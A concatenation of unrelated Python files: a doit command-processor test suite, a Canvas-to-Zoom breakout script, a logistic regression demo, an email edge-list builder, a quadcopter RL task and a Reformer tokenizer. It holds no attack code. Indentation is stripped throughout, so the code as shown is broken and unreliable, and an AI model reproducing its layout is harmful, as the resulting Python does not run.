of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
IN THE SOFTWARE.\
"""
import unittest
from doit.support.cmd.errors import \
CommandProcessorError, \
CommandError
from doit.support.cmd.runtime import \
isderived, \
Location, \
Pair, \
List, \
HashMap, \
UserType, \
ExceptionClass, \
Procedure
from doit.support.cmd.eval import \
MetaInfo, \
Environment, \
CommandProcessor
from doit.support.cmd.commands import \
CommandContext, \
Initializer, \
Finalizer, \
Command, \
Lambda, \
Call, Return
class LoggingEnv(Environment):
__slots__ = []
def __init__(self, processor = None, outer = None):
Environment.__init__(self, processor, outer)
#-def
def wlog(self, processor, msg):
processor.log.append(msg)
#-def
#-class
class LoggingProcessor(CommandProcessor):
__slots__ = [ 'log' ]
def __init__(self, env = None):
CommandProcessor.__init__(self, env)
self.log = []
#-def
#-class
class TLoad(Command):
__slots__ = [ 'varname' ]
def __init__(self, varname):
Command.__init__(self)
self.varname = varname
#-def
def enter(self, processor, inlz):
inlz.ctx.env = processor.getenv()
inlz.ctx.nvals = processor.nvals()
processor.pushctx(inlz.ctx)
#-def
def expand(self, processor):
ctx = CommandContext(self)
processor.insertcode(Initializer(ctx), self.do_load, Finalizer(ctx))
#-def
def do_load(self, processor):
ctx = processor.cmdctx(self)
processor.setacc(ctx.env.getvar(self.varname))
#-def
def leave(self, processor, fnlz):
while processor.nvals() > fnlz.ctx.nvals:
processor.popval()
processor.popctx(fnlz.ctx)
#-def
#-class
class TStore(Command):
__slots__ = [ 'varname' ]
def __init__(self, varname):
Command.__init__(self)
self.varname = varname
#-def
def enter(self, processor, inlz):
inlz.ctx.env = processor.getenv()
inlz.ctx.nvals = processor.nvals()
processor.pushctx(inlz.ctx)
#-def
def expand(self, processor):
ctx = CommandContext(self)
processor.insertcode(Initializer(ctx), self.do_store, Finalizer(ctx))
#-def
def do_store(self, processor):
ctx = processor.cmdctx(self)
ctx.env.setvar(self.varname, processor.acc())
#-def
def leave(self, processor, fnlz):
while processor.nvals() > fnlz.ctx.nvals:
processor.popval()
processor.popctx(fnlz.ctx)
#-def
#-class
class TBlock(Command):
__slots__ = [ 'cmds' ]
def __init__(self, cmds):
Command.__init__(self)
self.cmds = tuple(cmds)
#-def
def enter(self, processor, inlz):
inlz.ctx.env = processor.envclass()(processor, processor.getenv())
inlz.ctx.nvals = processor.nvals()
processor.pushctx(inlz.ctx)
#-def
def expand(self, processor):
ctx = CommandContext(self)
processor.insertcode(
*((Initializer(ctx),) + self.cmds + (Finalizer(ctx),))
)
#-def
def leave(self, processor, fnlz):
while processor.nvals() > fnlz.ctx.nvals:
processor.popval()
processor.popctx(fnlz.ctx)
#-def
#-class
class TLogBlock(TBlock):
__slots__ = [ 'i' ]
def __init__(self, i, cmds):
TBlock.__init__(self, cmds)
self.i = i
#-def
def enter(self, processor, inlz):
TBlock.enter(self, processor, inlz)
inlz.ctx.env.wlog(processor, "<%d>" % self.i)
#-def
def leave(self, processor, fnlz):
fnlz.ctx.env.wlog(processor, "</%d>" % self.i)
TBlock.leave(self, processor, fnlz)
#-def
#-class
class TSet(Command):
__slots__ = [ 'varname', 'value' ]
def __init__(self, varname, value):
Command.__init__(self)
self.varname = varname
self.value = value
#-def
def enter(self, processor, inlz):
inlz.ctx.env = processor.getenv()
inlz.ctx.nvals = processor.nvals()
processor.pushctx(inlz.ctx)
#-def
def expand(self, processor):
ctx = CommandContext(self)
processor.insertcode(Initializer(ctx), self.do_set, Finalizer(ctx))
#-def
def do_set(self, processor):
ctx = processor.cmdctx(self)
ctx.env.setvar(self.varname, self.value)
#-def
def leave(self, processor, fnlz):
while processor.nvals() > fnlz.ctx.nvals:
processor.popval()
processor.popctx(fnlz.ctx)
#-def
#-class
class TLoadEnv(Command):
__slots__ = [ 'load_global' ]
def __init__(self, load_global = False):
Command.__init__(self)
self.load_global = load_global
#-def
def enter(self, processor, inlz):
inlz.ctx.env = processor.getenv() if not self.load_global else None
inlz.ctx.nvals = processor.nvals()
processor.pushctx(inlz.ctx)
#-def
def expand(self, processor):
ctx = CommandContext(self)
processor.insertcode(Initializer(ctx), self.do_loadenv, Finalizer(ctx))
#-def
def do_loadenv(self, processor):
processor.setacc(processor.getenv())
#-def
def leave(self, processor, fnlz):
while processor.nvals() > fnlz.ctx.nvals:
processor.popval()
processor.popctx(fnlz.ctx)
#-def
#-class
class TThrow(Command):
__slots__ = [ 'ename', 'emsg' ]
def __init__(self, ename, emsg):
Command.__init__(self)
self.ename = ename
self.emsg = emsg
#-def
def expand(self, processor):
processor.insertcode(self.do_throw)
#-def
def do_throw(self, processor):
ecls = processor.getenv().getvar(self.ename)
tb = processor.traceback()
if not isinstance(ecls, ExceptionClass):
raise CommandError(processor.TypeError,
"Only exception objects can be throwed",
tb
)
processor.insertcode(CommandError(ecls, self.emsg, tb))
#-def
#-class
class TTryCatch(Command):
__slots__ = [ 'cmds', 'handlers' ]
def __init__(self, cmds, handlers):
Command.__init__(self)
self.cmds = tuple(cmds)
self.handlers = handlers
#-def
def enter(self, processor, inlz):
inlz.ctx.env = processor.getenv()
inlz.ctx.nvals = processor.nvals()
processor.pushctx(inlz.ctx)
#-def
def expand(self, processor):
ctx = CommandContext(self)
processor.insertcode(
*((Initializer(ctx),) + self.cmds + (Finalizer(ctx),))
)
#-def
def leave(self, processor, fnlz):
while processor.nvals() > fnlz.ctx.nvals:
processor.popval()
processor.popctx(fnlz.ctx)
#-def
def find_exception_handler(self, ctx, e):
try:
if not (
isinstance(e, CommandError)
and isinstance(e.ecls, ExceptionClass)
):
return None
for name, vname, handler in self.handlers:
ec = ctx.env.getvar(name)
if isderived(e.ecls, ec):
if vname:
ctx.env.setvar(vname, e)
return handler
return None
except CommandError as ce:
return [ce]
#-def
#-class
class TestMetaInfoCase(unittest.TestCase):
def test_equality(self):
m1 = MetaInfo()
m2 = MetaInfo()
m3 = MetaInfo()
m3.qname = "x::y"
m3.location = Location("t", 1, 2)
m4 = MetaInfo()
m4.qname = "x::y"
m4.location = Location("t", 1, 3)
m5 = MetaInfo()
m5.qname = "x::y"
m5.location = Location("t", 1, 3)
self.assertEqual(m1, m2)
self.assertNotEqual(m1, 1)
self.assertNotEqual(m3, m4)
self.assertEqual(m4, m4)
self.assertEqual(m4, m5)
#-def
#-class
class TestEnvironmentCase(unittest.TestCase):
def test_vars(self):
p = CommandProcessor()
e1 = Environment(p)
e1.setvar('x', 42)
e2 = Environment(outer = e1)
e2.processor = p
e2.setvar('x', 43)
e2['y'] = 44
self.assertIs(e2.outer(), e1)
self.assertEqual(e1.getvar('x'), 42)
self.assertEqual(e2.getvar('x'), 43)
with self.assertRaises(CommandError):
e1.getvar('y')
self.assertEqual(e2.getvar('y'), 44)
with self.assertRaises(CommandError):
e1.getvar('z')
with self.assertRaises(CommandError):
e2.getvar('z')
e2.unsetvar('x')
self.assertEqual(e1.getvar('x'), 42)
self.assertEqual(e2.getvar('x'), 42)
with self.assertRaises(CommandError):
e1.getvar('y')
self.assertEqual(e2.getvar('y'), 44)
with self.assertRaises(CommandError):
e1.getvar('z')
with self.assertRaises(CommandError):
e2.getvar('z')
e2.unsetvar('x')
self.assertEqual(e1.getvar('x'), 42)
self.assertEqual(e2.getvar('x'), 42)
with self.assertRaises(CommandError):
e1.getvar('y')
self.assertEqual(e2.getvar('y'), 44)
with self.assertRaises(CommandError):
e1.getvar('z')
with self.assertRaises(CommandError):
e2.getvar('z')
e1.unsetvar('x')
with self.assertRaises(CommandError):
e1.getvar('x')
with self.assertRaises(CommandError):
e2.getvar('x')
with self.assertRaises(CommandError):
e1.getvar('y')
self.assertEqual(e2.getvar('y'), 44)
with self.assertRaises(CommandError):
e1.getvar('z')
with self.assertRaises(CommandError):
e2.getvar('z')
e1.unsetvar('x')
with self.assertRaises(CommandError):
e1.getvar('x')
with self.assertRaises(CommandError):
e2.getvar('x')
with self.assertRaises(CommandError):
e1.getvar('y')
self.assertEqual(e2.getvar('y'), 44)
with self.assertRaises(CommandError):
e1.getvar('z')
with self.assertRaises(CommandError):
e2.getvar('z')
e1.unsetvar('y')
with self.assertRaises(CommandError):
e1.getvar('x')
with self.assertRaises(CommandError):
e2.getvar('x')
with self.assertRaises(CommandError):
e1.getvar('y')
self.assertEqual(e2.getvar('y'), 44)
with self.assertRaises(CommandError):
e1.getvar('z')
with self.assertRaises(CommandError):
e2.getvar('z')
e2.unsetvar('y')
with self.assertRaises(CommandError):
e1.getvar('x')
with self.assertRaises(CommandError):
e2.getvar('x')
with self.assertRaises(CommandError):
e1.getvar('y')
with self.assertRaises(CommandError):
e2.getvar('y')
with self.assertRaises(CommandError):
e1.getvar('z')
with self.assertRaises(CommandError):
e2.getvar('z')
e2.unsetvar('y')
with self.assertRaises(CommandError):
e1.getvar('x')
with self.assertRaises(CommandError):
e2.getvar('x')
with self.assertRaises(CommandError):
e1.getvar('y')
with self.assertRaises(CommandError):
e2.getvar('y')
with self.assertRaises(CommandError):
e1.getvar('z')
with self.assertRaises(CommandError):
e2.getvar('z')
e2.unsetvar('z')
with self.assertRaises(CommandError):
e1.getvar('x')
with self.assertRaises(CommandError):
e2.getvar('x')
with self.assertRaises(CommandError):
e1.getvar('y')
with self.assertRaises(CommandError):
e2.getvar('y')
with self.assertRaises(CommandError):
e1.getvar('z')
with self.assertRaises(CommandError):
e2.getvar('z')
e1.unsetvar('z')
with self.assertRaises(CommandError):
e1.getvar('x')
with self.assertRaises(CommandError):
e2.getvar('x')
with self.assertRaises(CommandError):
e1.getvar('y')
with self.assertRaises(CommandError):
e2.getvar('y')
with self.assertRaises(CommandError):
e1.getvar('z')
with self.assertRaises(CommandError):
e2.getvar('z')
e2.setvar('z', 7)
with self.assertRaises(CommandError):
e1.getvar('x')
with self.assertRaises(CommandError):
e2.getvar('x')
with self.assertRaises(CommandError):
e1.getvar('y')
with self.assertRaises(CommandError):
e2.getvar('y')
with self.assertRaises(CommandError):
e1.getvar('z')
self.assertEqual(e2.getvar('z'), 7)
#-def
#-class
class TestCommandProcessorCase(unittest.TestCase):
def test_constants(self):
p = CommandProcessor()
self.assertIs(p.Null, p)
self.assertIsNone(p.BaseException.base())
self.assertEqual(str(p.BaseException), 'BaseException')
self.assertIs(p.Exception.base(), p.BaseException)
self.assertEqual(str(p.Exception), 'Exception')
self.assertIs(p.SyntaxError.base(), p.Exception)
self.assertEqual(str(p.SyntaxError), 'SyntaxError')
self.assertIs(p.NameError.base(), p.Exception)
self.assertEqual(str(p.NameError), 'NameError')
self.assertIs(p.TypeError.base(), p.Exception)
self.assertEqual(str(p.TypeError), 'TypeError')
self.assertIs(p.ValueError.base(), p.Exception)
self.assertEqual(str(p.ValueError), 'ValueError')
self.assertIs(p.IndexError.base(), p.Exception)
self.assertEqual(str(p.IndexError), 'IndexError')
self.assertIs(p.KeyError.base(), p.Exception)
self.assertEqual(str(p.KeyError), 'KeyError')
with self.assertRaises(CommandProcessorError):
p.Uvw
#-def
def test_given_env(self):
e = Environment()
p = CommandProcessor(e)
e.setvar('$$', 8)
self.assertIsNone(p.acc())
p.run([TLoad('$$')])
self.assertEqual(p.acc(), 8)
#-def
def test_getenv(self):
e = Environment()
e.setvar('x', "<1>")
p = CommandProcessor(e)
self.assertIs(p.getenv(), e)
p.run([TLoadEnv(True)])
self.assertIs(p.acc(), e)
p.run([
TBlock([
TSet('y', "<2>"), TLoadEnv(False)
])
])
self.assertIsNot(p.acc(), e)
self.assertEqual(p.acc().getvar('x'), "<1>")
self.assertEqual(p.acc().getvar('y'), "<2>")
with self.assertRaises(CommandError):
e.getvar('y')
#-def
def test_ctxstack(self):
p = CommandProcessor()
c1 = Command()
c2 = Command()
ctx1 = CommandContext(c1)
ctx2 = CommandContext(c2)
with self.assertRaises(CommandProcessorError):
p.popctx(ctx1)
p.pushctx(ctx1)
with self.assertRaises(CommandProcessorError):
p.popctx(ctx2)
p.popctx(ctx1)
with self.assertRaises(CommandProcessorError):
p.popctx(ctx1)
with self.assertRaises(CommandProcessorError):
p.cmdctx(c1)
p.pushctx(ctx1)
with self.assertRaises(CommandProcessorError):
p.cmdctx(c1)
p.insertcode(c1, Finalizer(ctx2), Finalizer(ctx1))
with self.assertRaises(CommandProcessorError):
p.cmdctx(c1)
p.insertcode(c2, Finalizer(ctx1))
with self.assertRaises(CommandProcessorError):
p.cmdctx(c2)
self.assertIs(p.cmdctx(c1), ctx1)
#-def
def test_valstack(self):
p = CommandProcessor()
self.assertEqual(p.nvals(), 0)
with self.assertRaises(CommandProcessorError):
p.topval()
self.assertEqual(p.nvals(), 0)
with self.assertRaises(CommandProcessorError):
p.popval()
self.assertEqual(p.nvals(), 0)
p.pushval(1)
self.assertEqual(p.nvals(), 1)
p.pushval(2)
self.assertEqual(p.nvals(), 2)
p.setacc(3)
self.assertEqual(p.nvals(), 2)
p.pushacc()
self.assertEqual(p.nvals(), 3)
self.assertEqual(p.topval(), 3)
self.assertEqual(p.nvals(), 3)
self.assertEqual(p.popval(), 3)
self.assertEqual(p.nvals(), 2)
self.assertEqual(p.topval(), 2)
self.assertEqual(p.nvals(), 2)
self.assertEqual(p.popval(), 2)
self.assertEqual(p.nvals(), 1)
self.assertEqual(p.topval(), 1)
self.assertEqual(p.nvals(), 1)
self.assertEqual(p.popval(), 1)
self.assertEqual(p.nvals(), 0)
with self.assertRaises(CommandProcessorError):
p.topval()
self.assertEqual(p.nvals(), 0)
with self.assertRaises(CommandProcessorError):
p.popval()
self.assertEqual(p.nvals(), 0)
#-def
def test_acc(self):
p = CommandProcessor()
self.assertIsNone(p.acc())
p.setacc("ax")
self.assertEqual(p.acc(), "ax")
#-def
def test_run(self):
p = CommandProcessor()
p.run([True])
self.assertIs(p.acc(), True)
p.run([False])
self.assertIs(p.acc(), False)
p.run([1])
self.assertEqual(p.acc(), 1)
p.run([1.25])
self.assertEqual(p.acc(), 1.25)
p.run(["abc"])
self.assertEqual(p.acc(), "abc")
p.run([Pair(3, 7)])
self.assertIsInstance(p.acc(), Pair)
self.assertEqual(p.acc(), (3, 7))
p.run([List("xyz")])
self.assertIsInstance(p.acc(), List)
self.assertEqual(p.acc(), [ 'x', 'y', 'z' ])
p.run([HashMap({'a': 0.5, 1: 'x'})])
self.assertIsInstance(p.acc(), HashMap)
self.assertEqual(p.acc(), {'a': 0.5, 1: 'x'})
ut = UserType()
p.run([ut])
self.assertIsInstance(p.acc(), UserType)
self.assertIs(p.acc(), ut)
p.run([Procedure(1, 2, 3, 4, 5, 6, 7)])
self.assertIsInstance(p.acc(), Procedure)
self.assertEqual(p.acc(), (1, 2, 3, 4, 5, 6, 7))
p.run([(2, 5)])
self.assertIsInstance(p.acc(), Pair)
self.assertEqual(p.acc(), (2, 5))
with self.assertRaises(CommandProcessorError):
p.run([()])
with self.assertRaises(CommandProcessorError):
p.run([(1,)])
with self.assertRaises(CommandProcessorError):
p.run([(1, 3, -1)])
with self.assertRaises(CommandProcessorError):
p.run([(1, 3, -1, 0.25)])
p.run([[1, 2, 3]])
self.assertIsInstance(p.acc(), List)
self.assertEqual(p.acc(), [1, 2, 3])
p.run([{0.5: "cc", -4: (1,), ('a', 3): 0.25}])
self.assertIsInstance(p.acc(), HashMap)
self.assertEqual(p.acc(), {0.5: "cc", -4: (1,), ('a', 3): 0.25})
p.run([None])
self.assertIs(p.acc(), p.Null)
p.run([p.Null])
self.assertIs(p.acc(), p.Null)
with self.assertRaises(CommandProcessorError):
p.run([CommandProcessor()])
#-def
def test_event_handling(self):
p = CommandProcessor()
c = Command()
_c = Command()
ctx = CommandContext(c)
_ctx = CommandContext(_c)
with self.assertRaises(CommandProcessorError):
p.run([TLoad('?'), TSet('x', -1)])
with self.assertRaises(CommandProcessorError):
p.run([TLoad('?'), c, _c, c])
p.run([
TTryCatch([
TLoad('?')
], [
('TypeError', "", [TSet('et', 1)]),
('NameError', "", [TSet('et', 2)])
])
])
self.assertEqual(p.getenv().getvar('et'), 2)
p.run([
TTryCatch([
TLoad('?')
], [
('BaseException', "", [TSet('et', 0)]),
('TypeError', "", [TSet('et', 1)]),
('NameError', "", [TSet('et', 2)])
])
])
self.assertEqual(p.getenv().getvar('et'), 0)
with self.assertRaises(CommandProcessorError):
p.run([
TTryCatch([
TLoad('?')
], [
('_TypeError', "", [TSet('et', 1)]),
('NameError', "", [TSet('et', 2)])
])
])
p.run([
TTryCatch([
TLoad('?')
], [
('NameError', "", [TSet('et', 3)]),
('_NameError', "", [TSet('et', 4)])
])
])
self.assertEqual(p.getenv().getvar('et'), 3)
p.run([
TTryCatch([
TTryCatch([
TLoad('?')
], [
('TypeError', "", [TSet('et', 5)]),
('_Error', "", [TSet('et', 6)])
])
], [
('NameError', "", [TSet('et', 7)])
])
])
self.assertEqual(p.getenv().getvar('et'), 7)
with self.assertRaises(CommandProcessorError):
p.run([
TTryCatch([
TTryCatch([
TLoad('?')
], [
('TypeError', "", [TSet('et', 5)]),
('_Error', "", [TSet('et', 6)])
])
], [
('TypeError', "", [TSet('et', 7)])
])
])
with self.assertRaises(CommandProcessorError):
p.run([
TTryCatch([
TLoad('?'), Finalizer(Command())
], [
('NameError', "", [])
])
])
with self.assertRaises(CommandProcessorError):
p.run([Return()])
with self.assertRaises(CommandProcessorError):
p.popctx(ctx)
with self.assertRaises(CommandProcessorError):
p.run([Return(), c, c, c])
p.pushctx(_ctx)
with self.assertRaises(CommandProcessorError):
p.run([Return(), c, c, c, Finalizer(ctx)])
p.popctx(_ctx)
with self.assertRaises(CommandProcessorError):
p.popctx(_ctx)
with self.assertRaises(CommandProcessorError):
p.run([Return(), c, c, c, Finalizer(_ctx)])
p.pushctx(_ctx)
with self.assertRaises(CommandProcessorError):
p.run([Return(), c, c, c, Finalizer(_ctx), c, c])
p.popctx(_ctx)
p.run([
Call(Lambda([], False, [Return()], []))
])
self.assertIs(p.acc(), p.Null)
#-def
def test_cleanup(self):
le = LoggingEnv()
p = LoggingProcessor(le)
try:
p.pushval(0)
p.pushval(7)
p.setacc('z')
p.run([
TLogBlock(1, [
TLogBlock(2, [
CommandProcessor(),
TSet('x', 'y'),
CommandProcessor(),
TSet('x', 'y')
]),
TSet('x', 'y')
]),
TSet('x', 'y')
])
except CommandProcessorError:
pass
self.assertEqual(p.log, [ "<1>", "<2>" ])
self.assertEqual(p.popval(), 7)
self.assertEqual(p.popval(), 0)
with self.assertRaises(CommandProcessorError):
p.popval()
self.assertEqual(p.acc(), 'z')
le = LoggingEnv()
p = LoggingProcessor(le)
try:
p.pushval(0)
p.pushval(7)
p.setacc('z')
p.run([
TLogBlock(1, [
TLogBlock(2, [
CommandProcessor(),
TSet('x', 'y'),
CommandProcessor(),
TSet('x', 'y')
]),
TSet('x', 'y')
]),
TSet('x', 'y')
])
except CommandProcessorError:
p.cleanup()
self.assertEqual(p.log, [ "<1>", "<2>", "</2>", "</1>" ])
with self.assertRaises(CommandProcessorError):
p.popval()
self.assertIsNone(p.acc())
#-def
def test_impls(self):
p = CommandProcessor()
p.print_impl("abc")
#-def
#-class
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestMetaInfoCase))
suite.addTest(unittest.makeSuite(TestEnvironmentCase))
suite.addTest(unittest.makeSuite(TestCommandProcessorCase))
return suite
#-def
|
from canvasapi import Canvas
from canvas_zoom_breakouts.canvas_zoom_breakouts import canvas_zoom_breakouts
CANVAS_API_URL="https://canvas.iastate.edu"
# See: https://canvasapi.readthedocs.io/en/stable/
# Obtain CANVAS_API_KEY by going to your Canvas
# account settings, scrolling to "Approved Integrations"
# and selecting "New Access Token" These tokens will last
# according to the expiration selected when you create
# them.
CANVAS_API_KEY="INSERT_CANVAS_API_KEY_HERE"
course_name="Enter Course Name Here"
group_category_name="Canvas group" # Name of the Canvas group set of interest
email_suffix="@iastate.edu" # ... suffix that converts User ID's to email addresses registered with Zoom
canvas = Canvas(CANVAS_API_URL,CANVAS_API_KEY)
(course,
canvpart_by_netid,
groups_by_name,
zoom_csvfile_string) = canvas_zoom_breakouts(canvas,email_suffix,course_name,group_category_name,course_name+"_zoom_breakouts.csv")
|
# _*_ coding: utf-8 _*_
from numpy import *
## logistic函数是要寻找一种最佳拟合方法,这一点与线性方程非常类似
## 但它使用了梯度下降法来最快速地寻找数据
## 这使得它对多参数的二分类比较适合
class LogisticDemo:
def sigmoid(self, inX):
return 1.0 / (1 + exp(-inX))
## 梯度下降法求最佳拟合参数
## 拟合了500次
def fit_gradAscent(self, dataMatIn, classLabels):
dataMatrix = mat(dataMatIn) #convert to NumPy matrix
labelMat = mat(classLabels).transpose() #convert to NumPy matrix
m, n = shape(dataMatrix)
alpha = 0.001
maxCycles = 500
weights = ones((n, 1))
for k in range(maxCycles): #heavy on matrix operations
h = self.sigmoid(dataMatrix * weights) #matrix mult
error = (labelMat - h) #vector subtraction
weights = weights + alpha * dataMatrix.transpose() * error #matrix mult
## 将matrix转化为ndarry
weights = asarray(weights).reshape(-1)
return weights
## 随机梯度
## 拟合200次
def fit_stocGradAscent0(self, dataMatrix, classLabels):
m, n = shape(dataMatrix)
alpha = 0.01
weights = ones(n) #initialize to all ones
for i in range(m):
h = self.sigmoid(sum(dataMatrix[i] * weights))
error = classLabels[i] - h
weights = weights + alpha * error * dataMatrix[i]
return weights
## 改进随机梯度
def fit_stocGradAscent1(self, dataMatrix, classLabels, numIter=150):
m, n = shape(dataMatrix)
weights = ones(n) #initialize to all ones
for j in range(numIter):
dataIndex = range(m)
for i in range(m):
alpha = 4 / (1.0 + j + i) + 0.0001 #apha decreases with iteration, does not
randIndex = int(random.uniform(0, len(dataIndex)))#go to 0 because of the constant
h = self.sigmoid(sum(dataMatrix[randIndex] * weights))
error = classLabels[randIndex] - h
weights = weights + alpha * error * dataMatrix[randIndex]
del (dataIndex[randIndex])
return weights
def plotBestfit(self, weights, dataMat, labelMat):
import numpy as np
import matplotlib.pyplot as plt
dataArr = array(dataMat)
n = shape(dataArr)[0]
xcord1 = [];
ycord1 = []
xcord2 = [];
ycord2 = []
for i in range(n):
if int(labelMat[i]) == 1:
xcord1.append(dataArr[i, 1]);
ycord1.append(dataArr[i, 2])
else:
xcord2.append(dataArr[i, 1]);
ycord2.append(dataArr[i, 2])
fig = plt.figure()
ax = fig.add_subplot(111)
ax.scatter(xcord1, ycord1, s=30, c='red', marker='s')
ax.scatter(xcord2, ycord2, s=30, c='green')
x = np.arange(-3.0, 3.0, 0.1)
a = float(weights[0])
b = float(weights[1])
c = float(weights[2])
y = ( -a - b * x) / c
ax.plot(x, y)
plt.xlabel('X1')
plt.ylabel('X2')
plt.show()
## 计算分类
def predict(self, inX, weights):
prob = self.sigmoid(sum(inX * weights))
if prob > 0.5:
return 1.0
else:
return 0.0
|
import os
import sys
import parseEmail
from collections import defaultdict
def generateAllEgdeList(folderName,value=['To', 'From'],all_sent=['sent','_sent_mail','sent_items','_sent'],start_date='1 1 1998',end_date='31 12 2002'):
"""Return an edgeList for all the emails
value: the different section of the email
can be user specified
default to ['Subject','Date','To', 'From','Body']
all_sent:contains the directory to all the sent emails
can be user specified
deafult to ['sent','_sent_mail','sent_items','_sent']
start_date: the minimum date that an email can have to be considered.
It has a format of 'month day year'
Default to '1 1 1998'
end_date: The maximum email date that an email can have to be considered.
It has a format of 'month day year'
Default '31 12 2002'
Returned type: a default dictionary
"""
file=os.listdir(folderName)
generateAllEgdeList.edge=defaultdict(list)
if(type(all_sent) is not list):
all_sent=[all_sent]
for item in file:
if os.name == 'posix' :
egdeForUser = generateEgdeListForUser(folderName+'/'+item,value,all_sent,start_date,end_date)
else:
egdeForUser = generateEgdeListForUser(folderName+'\\'+item,value,all_sent,start_date,end_date)
generateAllEgdeList.edge['egdeList']=generateAllEgdeList.edge['egdeList']+egdeForUser['edgeList']
return generateAllEgdeList.edge
def generateEgdeListForUser(folderName,value=['To', 'From'],all_sent=['sent','_sent_mail','sent_items','_sent'],start_date='1 1 1998',end_date='31 12 2002'):
"""Generate an edgeList for a user
value: the different section of the email
can be user specified
default to ['Subject','Date','To', 'From','Body']
all_sent:contains the directory to all the sent emails
can be user specified
deafult to ['sent','_sent_mail','sent_items','_sent']
start_date: the minimum date that an email can have to be considered.
It has a format of 'month day year'
Default to '1 1 1998'
end_date: The maximum email date that an email can have to be considered.
It has a format of 'month day year'
Default '31 12 2002'
Returned type: a default dictionary
"""
if(type(all_sent) is not list):
all_sent=[all_sent]
generateEgdeListForUser.edge=defaultdict(list)
p=parseEmail.parseUserEmails(folderName,value,all_sent,start_date,end_date)
generateEgdeListForUser.edge['From']=(p['From'])
generateEgdeListForUser.edge['To']=(p['To'])
for i in range(0,len(generateEgdeListForUser.edge['From'])):
for y in range(0,len(generateEgdeListForUser.edge['From'][i])):
generateEgdeListForUser.edge['edgeList'].append(generateEgdeListForUser.edge['From'][i][y]+', '+generateEgdeListForUser.edge['To'][i][y])
return generateEgdeListForUser.edge
|
loop_couter = 0
while True:
print("Hello world")
loop_couter += 1
if loop_couter >= 3:
break
|
from Log import Log
import numpy as np
from physics_sim_fixed import PhysicsSim
class Task():
"""Task (environment) that defines the goal and provides feedback to the agent."""
def __init__(self, init_pose=None, init_velocities=None,
init_angle_velocities=None, runtime=10., target_pos=None, log=None):
"""Initialize a Task object.
Params
======
log (Log): Reference to the log utility.
init_pose: initial position of the quadcopter in (x,y,z) dimensions and the Euler angles
init_velocities: initial velocity of the quadcopter in (x,y,z) dimensions
init_angle_velocities: initial radians/second for each of the three Euler angles
runtime: time limit for each episode - originally only 5
target_pos: target/goal (x,y,z) position for the agent
"""
# Simulation
self.sim = PhysicsSim(init_pose, init_velocities, init_angle_velocities, runtime)
self.action_repeat = 3
self.state_size = self.action_repeat * 6
self.action_low = 1
self.action_high = 900
self.action_size = 4
# Goal
self.target_pos = target_pos if target_pos is not None else np.array([0., 0., 10., 0., 0., 0.])
def get_reward(self):
"""Uses current pose of sim to return reward."""
alpha = 0.2
max_reward = 1.0
pos_reward = 10.
reward_spread = 1.0
#reward = 1.-.3*(abs(self.sim.pose[:3] - self.target_pos)).sum() # Original
#reward = 1 / np.exp(np.sum(np.abs(self.sim.pose - self.target_pos)*alpha)) #v1
#reward = 1.-.3*(abs(self.sim.pose[:3] - self.target_pos)).sum() #v2
#reward = 1.-alpha*(abs(self.sim.pose - self.target_pos)).sum() #v3
#reward = 30.-alpha*( pos_reward*(abs(self.sim.pose[:3] - self.target_pos[:3])) + abs(self.sim.pose[3:] - self.target_pos[3:])).sum() #v4, 5
#reward = 1 / np.exp(np.sum(np.abs(self.sim.pose - self.target_pos)*alpha)) #v6
#reward = np.tanh(max_reward - np.sqrt(np.abs(self.sim.pose - self.target_pos).sum())) #v7
#reward = 1.-alpha*((self.target_pos - self.sim.pose) / reward_spread).sum() #v8
#reward = np.tanh(1.-alpha*((self.target_pos - self.sim.pose) / reward_spread).sum()) #v9
#reward = np.tanh(max_reward-alpha*(abs(self.sim.pose - self.target_pos)).sum()) / reward_spread #v10
#reward = np.tanh((max_reward-alpha*(abs(self.sim.pose - self.target_pos)).sum()) / reward_spread) #v10
#reward = np.tanh((max_reward-alpha*(pos_reward * abs(self.sim.pose[:3] - self.target_pos[:3]) + abs(self.sim.pose[3:] - self.target_pos[3:])).sum()) / reward_spread) #v11
reward = np.tanh(max_reward-alpha*((abs(self.sim.pose - self.target_pos)).sum())) / reward_spread #v12
#reward += pos_reward - np.abs(self.sim.pose[2] - self.target_pos[2]) #Special Z axis reward
#reward = np.tanh((max_reward-alpha*((abs(self.sim.pose - self.target_pos)).sum())) / reward_spread) #v13
return reward
def step(self, rotor_speeds):
"""Uses action to obtain next state, reward, done."""
reward = 0
pose_all = []
for _ in range(self.action_repeat):
done = self.sim.next_timestep(rotor_speeds) # update the sim pose and velocities
reward += self.get_reward()
pose_all.append(self.sim.pose)
next_state = np.concatenate(pose_all)
return next_state, reward, done
def reset(self):
"""Reset the sim to start a new episode."""
self.sim.reset()
state = np.concatenate([self.sim.pose] * self.action_repeat)
return state |
from paddle.utils import try_import
from paddlenlp.transformers.albert.tokenizer import AlbertEnglishTokenizer
class ReformerTokenizer(AlbertEnglishTokenizer):
resource_files_names = {
"sentencepiece_model_file": "spiece.model",
}
pretrained_resource_files_map = {
"sentencepiece_model_file": {
"reformer-crime-and-punishment": "https://huggingface.co/google/reformer-crime-and-punishment/resolve/main/spiece.model",
},
}
pretrained_init_configuration = {
"reformer-crime-and-punishment": {"do_lower_case": False},
}
def __init__(
self,
sentencepiece_model_file,
do_lower_case=False,
remove_space=True,
keep_accents=False,
eos_token="</s>",
unk_token="<unk>",
**kwargs
):
self.do_lower_case = do_lower_case
self.remove_space = remove_space
self.keep_accents = keep_accents
self.sentencepiece_model_file = sentencepiece_model_file
spm = try_import("sentencepiece")
self.sp_model = spm.SentencePieceProcessor()
self.sp_model.Load(sentencepiece_model_file)
def build_inputs_with_special_tokens(self, token_ids_0, token_ids_1=None):
if token_ids_1 is None:
return token_ids_0
return token_ids_0 + token_ids_1
